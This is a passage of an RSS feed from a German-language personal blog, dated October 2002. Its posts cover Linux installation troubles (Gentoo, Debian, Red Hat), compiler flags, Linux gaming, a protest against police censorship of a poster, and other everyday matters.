  15189.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15190.    <pubDate>Sun, 20 Oct 2002 00:42:00 +0000</pubDate>
  15191.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15192.    <description><![CDATA[Damit ihr's noch bequemer habt, gibt es jetzt ne Suchfunktion.<br>Warum das ganze via GET und nicht via POST funktioniert, erfährt ihr später noch. Wer's trotzdem rauskriegt, darf sich Geek nennen ;-]
  15193. ]]></description>
  15194.    <content:encoded><![CDATA[Damit ihr's noch bequemer habt, gibt es jetzt ne Suchfunktion.<br>Warum das ganze via GET und nicht via POST funktioniert, erfährt ihr später noch. Wer's trotzdem rauskriegt, darf sich Geek nennen ;-]
  15195. ]]></content:encoded>
  15196.  </item>
  15197.  
  15198.  <item>
  15199.    <title>Winterswap</title>
  15200.    <link>https://blog.x-way.org/Misc/2002/10/19/Winterswap.html</link>
  15201.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=114</guid>
  15202.    <dc:creator>Andreas Jaggi</dc:creator>
  15203.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15204.    <pubDate>Sat, 19 Oct 2002 16:41:00 +0000</pubDate>
  15205.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15206.    <description><![CDATA[<a href="https://web.archive.org/web/20030425234825/http://www.blogworld.de/entry.php?id=00250"><b>Da</b></a> bin ich natürlich dabei :-)
  15207. ]]></description>
  15208.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030425234825/http://www.blogworld.de/entry.php?id=00250"><b>Da</b></a> bin ich natürlich dabei :-)
  15209. ]]></content:encoded>
  15210.  </item>
  15211.  
  15212.  <item>
  15213.    <title>Gegen Zensur!</title>
  15214.    <link>https://blog.x-way.org/Misc/2002/10/19/Gegen_Zensur.html</link>
  15215.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=113</guid>
  15216.    <dc:creator>Andreas Jaggi</dc:creator>
  15217.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15218.    <pubDate>Sat, 19 Oct 2002 02:53:00 +0000</pubDate>
  15219.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15220.    <description><![CDATA[<a href="https://blog.x-way.org/images/antifaplakat.jpg" target="_blank"><b>Dieses Antifa-Plakat</b></a> wird von der Berliner Polizei zensiert. Bisher wurden schon verschiedene Websites abgemahnt, unter anderem <a href="https://web.archive.org/web/20021119210753/http://www1.antifa.de/"><b>antifa.de</b></a>, <a href="https://web.archive.org/web/20030118141906/http://www.linkeseite.de/Texte/antifatexte/1264doku.htm"><b>Linke Seite</b></a>, <a href="https://web.archive.org/web/20021126015140/http://www.jusos-suedwest.de/"><b>Jusos Steglitz/Zehlendorf</b></a>.<br>Der Berliner Polizei fehlt nicht nur jegliche Rechtsgrundlage dazu (eine richterliche Verfügung ist meines Wissens nicht vorhanden!), sondern sie verstösst damit auch gegen das <a href="https://web.archive.org/web/20021016075443/https://www.datenschutz-berlin.de/recht/de/gg/gg1_de.htm#art5"><b>Grundgesetz der BRD</b></a>!<br><br><a href="https://web.archive.org/web/20021210171436/http://www.finaroute.ch/sgemko/emrk.html"><b>Die Berliner Polizei verstösst damit auch gegen Artikel 10 (Freiheit der Meinungsäusserung) der Menschenrechte!</b></a><br><br>Stoppt die Zensur! Kopiert die Plakate und verteilt sie im ganzen Internet!<br><br>Politische Hintergründe und weitere Informationen zu der Sache gibts <a href="https://web.archive.org/web/20021207102250/http://www.antifaschistische-aktion.com/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=53&amp;mode=thread&amp;order=0&amp;thold=0"><b>hier</b></a>, <a href="http://www.heise.de/newsticker/data/wst-18.10.02-003/"><b>hier</b></a> und beim <a href="http://www.schockwellenreiter.de/2002/10/18.html#a8578"><b>Schockwellenreiter</b></a>.<br><br><br><a href="https://blog.x-way.org/images/antifaplakat.jpg"><img alt="Antifaplakat" src="https://blog.x-way.org/images/antifaplakat_s.jpg" height="291" width="200"></a>
  15221. ]]></description>
  15222.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/antifaplakat.jpg" target="_blank"><b>Dieses Antifa-Plakat</b></a> wird von der Berliner Polizei zensiert. Bisher wurden schon verschiedene Websites abgemahnt, unter anderem <a href="https://web.archive.org/web/20021119210753/http://www1.antifa.de/"><b>antifa.de</b></a>, <a href="https://web.archive.org/web/20030118141906/http://www.linkeseite.de/Texte/antifatexte/1264doku.htm"><b>Linke Seite</b></a>, <a href="https://web.archive.org/web/20021126015140/http://www.jusos-suedwest.de/"><b>Jusos Steglitz/Zehlendorf</b></a>.<br>Der Berliner Polizei fehlt nicht nur jegliche Rechtsgrundlage dazu (eine richterliche Verfügung ist meines Wissens nicht vorhanden!), sondern sie verstösst damit auch gegen das <a href="https://web.archive.org/web/20021016075443/https://www.datenschutz-berlin.de/recht/de/gg/gg1_de.htm#art5"><b>Grundgesetz der BRD</b></a>!<br><br><a href="https://web.archive.org/web/20021210171436/http://www.finaroute.ch/sgemko/emrk.html"><b>Die Berliner Polizei verstösst damit auch gegen Artikel 10 (Freiheit der Meinungsäusserung) der Menschenrechte!</b></a><br><br>Stoppt die Zensur! Kopiert die Plakate und verteilt sie im ganzen Internet!<br><br>Politische Hintergründe und weitere Informationen zu der Sache gibts <a href="https://web.archive.org/web/20021207102250/http://www.antifaschistische-aktion.com/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=53&amp;mode=thread&amp;order=0&amp;thold=0"><b>hier</b></a>, <a href="http://www.heise.de/newsticker/data/wst-18.10.02-003/"><b>hier</b></a> und beim <a href="http://www.schockwellenreiter.de/2002/10/18.html#a8578"><b>Schockwellenreiter</b></a>.<br><br><br><a href="https://blog.x-way.org/images/antifaplakat.jpg"><img alt="Antifaplakat" src="https://blog.x-way.org/images/antifaplakat_s.jpg" height="291" width="200"></a>
  15223. ]]></content:encoded>
  15224.  </item>
  15225.  
  15226.  <item>
  15227.    <title>Muss das sein?</title>
  15228.    <link>https://blog.x-way.org/Misc/2002/10/18/Muss_das_sein.html</link>
  15229.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=112</guid>
  15230.    <dc:creator>Andreas Jaggi</dc:creator>
  15231.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15232.    <pubDate>Fri, 18 Oct 2002 17:57:00 +0000</pubDate>
  15233.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15234.    <description><![CDATA[Ist den wirklich <a href="https://blog.x-way.org/stuff/outlook.php"><b>so viel</b></a> Zeichensalat nötig nur um das hier darzustellen?<br><br><div style="background-color: #FFFBF0;">-----Ursprüngliche Nachricht-----<br><b>Von:</b> Eberhard Mirjam [mailto:eberhard.mirjam@beaexpo.ch] <br><b>Gesendet:</b> Freitag, 18. Oktober 2002 13:24<br><b>An:</b> Linder Julia; alain@japan.com; perolli@gmx.ch; fli-5@gmx.net; danaga30@hotmail.com; mbosshard@publicitas.ch<br><b>Betreff:</b> Verhalten bei Notsituation<br><br><br><br><pre>... richtiges Verhalten bei plötzlichem Auftreten von Arbeit ...</pre><img alt="" src="https://blog.x-way.org/images/maus.gif" width="121" height="78"></div><br><br>Nachtrag:<br>Die Daten des Bildes sind da natürlich noch nicht dabei!
  15235. ]]></description>
  15236.    <content:encoded><![CDATA[Ist den wirklich <a href="https://blog.x-way.org/stuff/outlook.php"><b>so viel</b></a> Zeichensalat nötig nur um das hier darzustellen?<br><br><div style="background-color: #FFFBF0;">-----Ursprüngliche Nachricht-----<br><b>Von:</b> Eberhard Mirjam [mailto:eberhard.mirjam@beaexpo.ch] <br><b>Gesendet:</b> Freitag, 18. Oktober 2002 13:24<br><b>An:</b> Linder Julia; alain@japan.com; perolli@gmx.ch; fli-5@gmx.net; danaga30@hotmail.com; mbosshard@publicitas.ch<br><b>Betreff:</b> Verhalten bei Notsituation<br><br><br><br><pre>... richtiges Verhalten bei plötzlichem Auftreten von Arbeit ...</pre><img alt="" src="https://blog.x-way.org/images/maus.gif" width="121" height="78"></div><br><br>Nachtrag:<br>Die Daten des Bildes sind da natürlich noch nicht dabei!
  15237. ]]></content:encoded>
  15238.  </item>
  15239.  
  15240.  <item>
  15241.    <title>So nebenbei</title>
  15242.    <link>https://blog.x-way.org/Linux/2002/10/17/So_nebenbei.html</link>
  15243.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=111</guid>
  15244.    <dc:creator>Andreas Jaggi</dc:creator>
  15245.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15246.    <pubDate>Thu, 17 Oct 2002 23:50:00 +0000</pubDate>
  15247.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15248.    <description><![CDATA[Quake3 und RTCW laufen übrigens bei mir nun auch auf Linux.
  15249. ]]></description>
  15250.    <content:encoded><![CDATA[Quake3 und RTCW laufen übrigens bei mir nun auch auf Linux.
  15251. ]]></content:encoded>
  15252.  </item>
  15253.  
  15254.  <item>
  15255.    <title>Ha!</title>
  15256.    <link>https://blog.x-way.org/Linux/2002/10/17/Ha.html</link>
  15257.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=110</guid>
  15258.    <dc:creator>Andreas Jaggi</dc:creator>
  15259.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15260.    <pubDate>Thu, 17 Oct 2002 13:10:00 +0000</pubDate>
  15261.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15262.    <description><![CDATA[UT läuft nun auch unter Linux!
  15263. ]]></description>
  15264.    <content:encoded><![CDATA[UT läuft nun auch unter Linux!
  15265. ]]></content:encoded>
  15266.  </item>
  15267.  
  15268.  <item>
  15269.    <title>Gaming Tux</title>
  15270.    <link>https://blog.x-way.org/Linux/2002/10/16/Gaming_Tux.html</link>
  15271.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=109</guid>
  15272.    <dc:creator>Andreas Jaggi</dc:creator>
  15273.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15274.    <pubDate>Wed, 16 Oct 2002 16:43:00 +0000</pubDate>
  15275.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15276.    <description><![CDATA[<a href="https://holarse.de/"><b>Hier</b></a> findet man viele Informationen, über Games unter Linux. Leider noch nichts zu UT2003.
  15277. ]]></description>
  15278.    <content:encoded><![CDATA[<a href="https://holarse.de/"><b>Hier</b></a> findet man viele Informationen, über Games unter Linux. Leider noch nichts zu UT2003.
  15279. ]]></content:encoded>
  15280.  </item>
  15281.  
  15282.  <item>
  15283.    <title>Hahaha</title>
  15284.    <link>https://blog.x-way.org/Misc/2002/10/16/Hahaha.html</link>
  15285.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=108</guid>
  15286.    <dc:creator>Andreas Jaggi</dc:creator>
  15287.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15288.    <pubDate>Wed, 16 Oct 2002 01:35:00 +0000</pubDate>
  15289.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15290.    <description><![CDATA[<a href="https://web.archive.org/web/20021005182907/http://www.nucleostop.onlinehome.de/index.html"><b>NucleoSTOP</b></a>, ein kompaktes Gerät, das es in sich hat. Durch ein innovatives Verfahren wird Atomstrom sofort erkannt, und, bevor er Ihre wertvollen Elektrogeräte durchflutet, zurück zum Erzeuger geschickt.<br>Der Preis beträgt nur noch sensationelle 949,- Euro incl. MwSt.<br><br>Quelle: <a href="https://web.archive.org/web/20021004051645/http://www.monoklon.de/index.php"><b>monoklon.de</b></a>
  15291. ]]></description>
  15292.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021005182907/http://www.nucleostop.onlinehome.de/index.html"><b>NucleoSTOP</b></a>, ein kompaktes Gerät, das es in sich hat. Durch ein innovatives Verfahren wird Atomstrom sofort erkannt, und, bevor er Ihre wertvollen Elektrogeräte durchflutet, zurück zum Erzeuger geschickt.<br>Der Preis beträgt nur noch sensationelle 949,- Euro incl. MwSt.<br><br>Quelle: <a href="https://web.archive.org/web/20021004051645/http://www.monoklon.de/index.php"><b>monoklon.de</b></a>
  15293. ]]></content:encoded>
  15294.  </item>
  15295.  
  15296.  <item>
  15297.    <title>Und ich sprach, es werde graphisch und es ward graphisch.</title>
  15298.    <link>https://blog.x-way.org/Linux/2002/10/13/Und_ich_sprach_es_werde_graphisch_und_es_ward_graphisch.html</link>
  15299.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=107</guid>
  15300.    <dc:creator>Andreas Jaggi</dc:creator>
  15301.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15302.    <pubDate>Sun, 13 Oct 2002 11:10:00 +0000</pubDate>
  15303.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15304.    <description><![CDATA[X und Gnome laufen. Der Rest auch. <a href="http://waterwave.ch/weblog/detail.php?id=105"><b>Der Fehler mit dem Netzwerk</b></a> kam wegen eines nichteingesteckten Netzwerkkabels ...
  15305. ]]></description>
  15306.    <content:encoded><![CDATA[X und Gnome laufen. Der Rest auch. <a href="http://waterwave.ch/weblog/detail.php?id=105"><b>Der Fehler mit dem Netzwerk</b></a> kam wegen eines nichteingesteckten Netzwerkkabels ...
  15307. ]]></content:encoded>
  15308.  </item>
  15309.  
  15310.  <item>
  15311.    <title>Ich verkaufe resp. versteigere</title>
  15312.    <link>https://blog.x-way.org/Misc/2002/10/12/Ich_verkaufe_resp_versteigere.html</link>
  15313.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=106</guid>
  15314.    <dc:creator>Andreas Jaggi</dc:creator>
  15315.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15316.    <pubDate>Sat, 12 Oct 2002 16:15:00 +0000</pubDate>
  15317.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15318.    <description><![CDATA[<a href="#" class="gone"><b>Hier</b></a> versteigere ich 20 Internet-World Ausgaben inklusive CDs.<br>Ein idealer Einstieg ins Internet. Vermittelt Inhalte über Webdesign, Webprogrammierung (HTML, CSS, Javascript...), Internet Hard- und Software. Behandelt auch komplexere Themen wie PHP, ASP, Perl ...<br><br><b>Bietet mit und treibt den Preis in die Höhe ;-)</b>
  15319. ]]></description>
  15320.    <content:encoded><![CDATA[<a href="#" class="gone"><b>Hier</b></a> versteigere ich 20 Internet-World Ausgaben inklusive CDs.<br>Ein idealer Einstieg ins Internet. Vermittelt Inhalte über Webdesign, Webprogrammierung (HTML, CSS, Javascript...), Internet Hard- und Software. Behandelt auch komplexere Themen wie PHP, ASP, Perl ...<br><br><b>Bietet mit und treibt den Preis in die Höhe ;-)</b>
  15321. ]]></content:encoded>
  15322.  </item>
  15323.  
  15324.  <item>
  15325.    <title>Es geht wieder :-)</title>
  15326.    <link>https://blog.x-way.org/Linux/2002/10/12/Es_geht_wieder_-.html</link>
  15327.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=105</guid>
  15328.    <dc:creator>Andreas Jaggi</dc:creator>
  15329.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15330.    <pubDate>Sat, 12 Oct 2002 01:24:00 +0000</pubDate>
  15331.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15332.    <description><![CDATA[Hab Gentoo noch einaml ganz neu installiert.
  15333. Jedoch hab ich die CFLAGS etwas geändert:<br><br>Vorher:<br><br>
  15334. CFLAGS="-march=athlon-tbird"
  15335. <br><br>
  15336. Nachher:
  15337. <br><br>
  15338. CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer -mmmx -m3dnow -funroll-loops -frerun-cse-after-loop -falign-functions=4 -expensive-optimizations"
  15339. <br><br>
  15340. Daher ist diesmal auch kein Fehler beim kompilieren aufgetreten. Und: das kompilieren ging viel schneller.<br>Insgesamt (bootstrap &amp; system) hab ich an die 2 Stunden Zeit gespart!<br><br>Jedoch will jetzt das Netzwerk nicht mehr. Aber das wird wohl nicht so ein grosses Problem zum beheben sein...
  15341. ]]></description>
  15342.    <content:encoded><![CDATA[Hab Gentoo noch einaml ganz neu installiert.
  15343. Jedoch hab ich die CFLAGS etwas geändert:<br><br>Vorher:<br><br>
  15344. CFLAGS="-march=athlon-tbird"
  15345. <br><br>
  15346. Nachher:
  15347. <br><br>
  15348. CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer -mmmx -m3dnow -funroll-loops -frerun-cse-after-loop -falign-functions=4 -expensive-optimizations"
  15349. <br><br>
  15350. Daher ist diesmal auch kein Fehler beim kompilieren aufgetreten. Und: das kompilieren ging viel schneller.<br>Insgesamt (bootstrap &amp; system) hab ich an die 2 Stunden Zeit gespart!<br><br>Jedoch will jetzt das Netzwerk nicht mehr. Aber das wird wohl nicht so ein grosses Problem zum beheben sein...
  15351. ]]></content:encoded>
  15352.  </item>
  15353.  
  15354.  <item>
  15355.    <title>Dummes blödes Gentoo</title>
  15356.    <link>https://blog.x-way.org/Linux/2002/10/11/Dummes_bloedes_Gentoo.html</link>
  15357.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=104</guid>
  15358.    <dc:creator>Andreas Jaggi</dc:creator>
  15359.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15360.    <pubDate>Fri, 11 Oct 2002 13:34:00 +0000</pubDate>
  15361.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15362.    <description><![CDATA[Beim kompilieren des Systems (emerge system) kommt folgender Fehler bei der Installation von iptables 1.2.7a<pre>
  15363. !!! ERROR: The ebuild did not complete successfully.
  15364. !!! Function src_compile, Line 12, Exitcode 2
  15365. !!! (no error message)
  15366. </pre>
  15367. Kann mir mal einer sagen, weshalb das nicht gehen will, wo ich doch die aktuellen Sourcen habe.<pre>emerge sync</pre> hat auch nichts geholfen.
  15368. ]]></description>
  15369.    <content:encoded><![CDATA[Beim kompilieren des Systems (emerge system) kommt folgender Fehler bei der Installation von iptables 1.2.7a<pre>
  15370. !!! ERROR: The ebuild did not complete successfully.
  15371. !!! Function src_compile, Line 12, Exitcode 2
  15372. !!! (no error message)
  15373. </pre>
  15374. Kann mir mal einer sagen, weshalb das nicht gehen will, wo ich doch die aktuellen Sourcen habe.<pre>emerge sync</pre> hat auch nichts geholfen.
  15375. ]]></content:encoded>
  15376.  </item>
  15377.  
  15378.  <item>
  15379.    <title>Dualboot ist out! Es lebe Trialboot!</title>
  15380.    <link>https://blog.x-way.org/Linux/2002/10/11/Dualboot_ist_out_Es_lebe_Trialboot.html</link>
  15381.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=103</guid>
  15382.    <dc:creator>Andreas Jaggi</dc:creator>
  15383.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15384.    <pubDate>Fri, 11 Oct 2002 01:52:00 +0000</pubDate>
  15385.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15386.    <description><![CDATA[Mit diesem Motto hab ich heute tatkräftig meine HD noch einmal (fast) neu partitionniert. Meine Redhat-Partition musste dran glauben. Nur Windows blieb, weils mir zu aufwendig ist alles neu zu installieren.<br>Seither hab ich folgende Partitionstabelle:<br><pre>
  15387. /dev/hda1  ntfs    w2k-system
  15388. /dev/hda5  ntfs    w2k-programme
  15389. /dev/hda6  fat32   w2k-games
  15390. /dev/hda7  fat32   www
  15391. /dev/hda8  ext2/3  /boot gentoo
  15392. /dev/hda9  ext2/3  /     debian
  15393. /dev/hda10 ext2/3  /usr  debian
  15394. /dev/hda11 ext2/3  /var  debian
  15395. /dev/hda12 ext2/3  /tmp  debian
  15396. /dev/hda13 ext2/3  /     gentoo
  15397. /dev/hda14 ext2/3  /home
  15398. /dev/hda15 swap    swap
  15399. /dev/hda16 fat32   backup www
  15400. /dev/hda17 fat32   backup eigene dateien
  15401. /dev/hda18 fat32   eigene dateien
  15402. /dev/hda19 fat32   media
  15403. </pre><br>Nun ja, Debian läuft. Ausser dem X Zeugs. Bricht immer ab mit: No Screen(s) found. Und meldet noch, dass der Screen falsch komfiguriert sei. Dabei hab ich doch alles so eingegebn wies auf Verpackungen, Manuals etc. steht. *nerv*<br>Gentoo ist jetzt gerade beim Bootstrap, was soviel heisst wie: Kompilierer mit dem Kompilierer der CD kompilieren und nachdem glibc kompiliert ist nocheinmal den Kompilierer kompilieren, diesmal aber mit dem kompilierten Kompilierer. Einfach oder? ;-)
  15404. ]]></description>
  15405.    <content:encoded><![CDATA[Mit diesem Motto hab ich heute tatkräftig meine HD noch einmal (fast) neu partitionniert. Meine Redhat-Partition musste dran glauben. Nur Windows blieb, weils mir zu aufwendig ist alles neu zu installieren.<br>Seither hab ich folgende Partitionstabelle:<br><pre>
  15406. /dev/hda1  ntfs    w2k-system
  15407. /dev/hda5  ntfs    w2k-programme
  15408. /dev/hda6  fat32   w2k-games
  15409. /dev/hda7  fat32   www
  15410. /dev/hda8  ext2/3  /boot gentoo
  15411. /dev/hda9  ext2/3  /     debian
  15412. /dev/hda10 ext2/3  /usr  debian
  15413. /dev/hda11 ext2/3  /var  debian
  15414. /dev/hda12 ext2/3  /tmp  debian
  15415. /dev/hda13 ext2/3  /     gentoo
  15416. /dev/hda14 ext2/3  /home
  15417. /dev/hda15 swap    swap
  15418. /dev/hda16 fat32   backup www
  15419. /dev/hda17 fat32   backup eigene dateien
  15420. /dev/hda18 fat32   eigene dateien
  15421. /dev/hda19 fat32   media
  15422. </pre><br>Nun ja, Debian läuft. Ausser dem X Zeugs. Bricht immer ab mit: No Screen(s) found. Und meldet noch, dass der Screen falsch komfiguriert sei. Dabei hab ich doch alles so eingegebn wies auf Verpackungen, Manuals etc. steht. *nerv*<br>Gentoo ist jetzt gerade beim Bootstrap, was soviel heisst wie: Kompilierer mit dem Kompilierer der CD kompilieren und nachdem glibc kompiliert ist nocheinmal den Kompilierer kompilieren, diesmal aber mit dem kompilierten Kompilierer. Einfach oder? ;-)
  15423. ]]></content:encoded>
  15424.  </item>
  15425.  
  15426.  <item>
  15427.    <title>Ehre wem Ehre gebührt</title>
  15428.    <link>https://blog.x-way.org/Misc/2002/10/09/Ehre_wem_Ehre_gebuehrt.html</link>
  15429.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=102</guid>
  15430.    <dc:creator>Andreas Jaggi</dc:creator>
  15431.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15432.    <pubDate>Wed, 09 Oct 2002 01:18:00 +0000</pubDate>
  15433.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15434.    <description><![CDATA[Hab's gar nicht gemerkt: Meinen <a href="http://waterwave.ch/weblog/detail.php?id=100"><b>100. Eintrag</b></a> hab ich einem Microsoft Fehler gewidmet. Schande über mich ;-)
  15435. ]]></description>
  15436.    <content:encoded><![CDATA[Hab's gar nicht gemerkt: Meinen <a href="http://waterwave.ch/weblog/detail.php?id=100"><b>100. Eintrag</b></a> hab ich einem Microsoft Fehler gewidmet. Schande über mich ;-)
  15437. ]]></content:encoded>
  15438.  </item>
  15439.  
  15440.  <item>
  15441.    <title>Grub it!</title>
  15442.    <link>https://blog.x-way.org/Linux/2002/10/09/Grub_it.html</link>
  15443.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=101</guid>
  15444.    <dc:creator>Andreas Jaggi</dc:creator>
  15445.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15446.    <pubDate>Wed, 09 Oct 2002 01:12:00 +0000</pubDate>
  15447.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15448.    <description><![CDATA[Ha! Red Hat 8.0 läuft noch.<br>Hab schon mal mit dem personalisieren begonnen. Mein erstes Opfer: der GRUB Bootloader.<br><a href="https://blog.x-way.org/images/grub-splash.gif"><b>So</b></a> ungefähr sieht er jetzt aus (Bootmenu etc. fehlt); und <a href="https://blog.x-way.org/images/grub-splash.png"><b>so</b></a> sollte er eigentlich aussehen (ohne die Beschränkung auf 16 Farben).<br>Als nächstes kommt der graphische Login. Oder vielleicht mach ich noch einen Versuch mit Debian. Red Hat passt mir nicht so, ist mir etwas zu "aufdringlich".
  15449. ]]></description>
  15450.    <content:encoded><![CDATA[Ha! Red Hat 8.0 läuft noch.<br>Hab schon mal mit dem personalisieren begonnen. Mein erstes Opfer: der GRUB Bootloader.<br><a href="https://blog.x-way.org/images/grub-splash.gif"><b>So</b></a> ungefähr sieht er jetzt aus (Bootmenu etc. fehlt); und <a href="https://blog.x-way.org/images/grub-splash.png"><b>so</b></a> sollte er eigentlich aussehen (ohne die Beschränkung auf 16 Farben).<br>Als nächstes kommt der graphische Login. Oder vielleicht mach ich noch einen Versuch mit Debian. Red Hat passt mir nicht so, ist mir etwas zu "aufdringlich".
  15451. ]]></content:encoded>
  15452.  </item>
  15453.  
  15454.  <item>
  15455.    <title>Ätsch!</title>
  15456.    <link>https://blog.x-way.org/Misc/2002/10/08/Aetsch.html</link>
  15457.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=100</guid>
  15458.    <dc:creator>Andreas Jaggi</dc:creator>
  15459.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15460.    <pubDate>Tue, 08 Oct 2002 03:29:00 +0000</pubDate>
  15461.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15462.    <description><![CDATA[<pre>Microsoft OLE DB Provider for ODBC Drivers- Fehler '8007000e'
  15463.  
  15464. [Microsoft][ODBC Microsoft Access Driver] Nicht genügend Arbeitsspeicher.
  15465.  
  15466. /leftinc.asp, line 30</pre>
  15467. Gerade bei <a href="https://web.archive.org/web/20020928122818/http://www.stegpc.ch/"><b>Steg PC</b></a> entdeckt. <br>BTW: Hab jetzt Red Had Linux 8.0 am Laufen; damit sollte kein solcher Fehler passieren ;-)
  15468. ]]></description>
  15469.    <content:encoded><![CDATA[<pre>Microsoft OLE DB Provider for ODBC Drivers- Fehler '8007000e'
  15470.  
  15471. [Microsoft][ODBC Microsoft Access Driver] Nicht genügend Arbeitsspeicher.
  15472.  
  15473. /leftinc.asp, line 30</pre>
  15474. Gerade bei <a href="https://web.archive.org/web/20020928122818/http://www.stegpc.ch/"><b>Steg PC</b></a> entdeckt. <br>BTW: Hab jetzt Red Had Linux 8.0 am Laufen; damit sollte kein solcher Fehler passieren ;-)
  15475. ]]></content:encoded>
  15476.  </item>
  15477.  
  15478.  <item>
  15479.    <title>Bastel bastel</title>
  15480.    <link>https://blog.x-way.org/Linux/2002/10/07/Bastel_bastel.html</link>
  15481.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=99</guid>
  15482.    <dc:creator>Andreas Jaggi</dc:creator>
  15483.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15484.    <pubDate>Mon, 07 Oct 2002 03:02:00 +0000</pubDate>
  15485.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15486.    <description><![CDATA[Die LAN-Party ist am Samstag zu Ende gegangen. Nun habe ich Zeit mich wieder dem Basteln zu widmen ;-)<br>Nachdem ich bei <a href="http://www.gentoo.org/"><b>Gentoo Linux 1.2</b></a> bis zur Installtion von X gekommen bin und dann doch nicht weiter, habe ich mich mal mit <a href="http://www.debian.org/"><b>Debian 3.0</b></a>  versucht. Dort bin ich auch etwa an gleicher Stelle nicht mehr weiter gekommen. Habe dann ein <a href="http://rootlinux.org/"><b>Root Linux 1.2</b></a>, das gerade rumgelegen hat, installiert und dort habe ich noch schneller aufgegeben. Nun läuft wieder die Press-Edition von <a href="http://redhat.com/"><b>Redhat 7.3</b></a>. Beim installieren wollen von <a href="https://web.archive.org/web/20021017130120/https://www.gnome.org/~jdub/garnome/"><b>Garnome</b></a> kam die wunderschöne Meldung: <pre>bash: make: command not found</pre><br>Blöde Press-Edition. Nun bastel ich weiter; irgendwie wirds schon gehen (Neuaufsetzen). Dabei will ich doch nur auch <b><a href="http://art.gnome.org/images/screenshots/Evil_Aqua-Rip-Shot.jpg">so einen schönen Desktop</a></b> haben ;-)
  15487. ]]></description>
  15488.    <content:encoded><![CDATA[Die LAN-Party ist am Samstag zu Ende gegangen. Nun habe ich Zeit mich wieder dem Basteln zu widmen ;-)<br>Nachdem ich bei <a href="http://www.gentoo.org/"><b>Gentoo Linux 1.2</b></a> bis zur Installtion von X gekommen bin und dann doch nicht weiter, habe ich mich mal mit <a href="http://www.debian.org/"><b>Debian 3.0</b></a>  versucht. Dort bin ich auch etwa an gleicher Stelle nicht mehr weiter gekommen. Habe dann ein <a href="http://rootlinux.org/"><b>Root Linux 1.2</b></a>, das gerade rumgelegen hat, installiert und dort habe ich noch schneller aufgegeben. Nun läuft wieder die Press-Edition von <a href="http://redhat.com/"><b>Redhat 7.3</b></a>. Beim installieren wollen von <a href="https://web.archive.org/web/20021017130120/https://www.gnome.org/~jdub/garnome/"><b>Garnome</b></a> kam die wunderschöne Meldung: <pre>bash: make: command not found</pre><br>Blöde Press-Edition. Nun bastel ich weiter; irgendwie wirds schon gehen (Neuaufsetzen). Dabei will ich doch nur auch <b><a href="http://art.gnome.org/images/screenshots/Evil_Aqua-Rip-Shot.jpg">so einen schönen Desktop</a></b> haben ;-)
  15489. ]]></content:encoded>
  15490.  </item>
  15491.  
  15492.  <item>
  15493.    <title>UT 2003</title>
